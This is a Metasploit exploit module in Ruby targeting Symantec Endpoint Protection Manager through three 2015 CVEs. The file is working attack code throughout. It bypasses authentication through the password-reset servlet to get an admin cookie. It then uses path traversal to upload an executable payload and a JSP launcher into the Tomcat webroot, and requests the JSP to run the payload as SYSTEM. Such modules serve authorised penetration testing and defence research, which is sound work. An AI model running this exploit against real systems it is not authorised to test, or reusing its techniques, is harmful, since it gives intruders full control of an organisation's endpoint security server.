metasploit-framework/modules/exploits/windows/http/sepm_auth_bypass_rce.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
      'Description'    => %q{
      This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
      in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bperry', #metasploit module
          'Markus Wulftange' #discovery
        ],
      'References'     =>
        [
          ['CVE', '2015-1486'],
          ['CVE', '2015-1487'],
          ['CVE', '2015-1489'],
          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
        ],
      'Payload'        => { 'BadChars' => "" },
      'DefaultOptions' => {
        'SSL' => true
      },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {
            'Arch' => ARCH_X86,
            'Payload' => {
              'DisableNops' => true
            }
          } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 31 2015',
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(8443),
          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
        ], self.class)
  end

  def exploit

    meterp = Rex::Text.rand_text_alpha(10)
    jsp = Rex::Text.rand_text_alpha(10)

    print_status("Getting cookie")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_post' => {
        'ActionType' => 'ResetPassword',
        'UserID' => 'admin',
        'Domain' => ''
      }
    })

    unless res
      fail_with(Failure::Unknown, 'The server did not respond in an expected way')
    end

    cookie = res.get_cookies

    if not cookie || cookie == ''
      fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
    end

    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
    }

    print_status("Uploading payload...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
        'KnownHosts' => '.'
      },
      'data' => payload.encoded_exe,
      'cookie' => cookie,
      'ctype' => ''
    })

    print_status("Uploading JSP page to execute the payload...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
        'KnownHosts' => '.'
      },
      'data' => exec,
      'cookie' => cookie,
      'ctype' => ''
    })

    print_status("Executing payload. Manual cleanup will be required.")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
    })
  end
end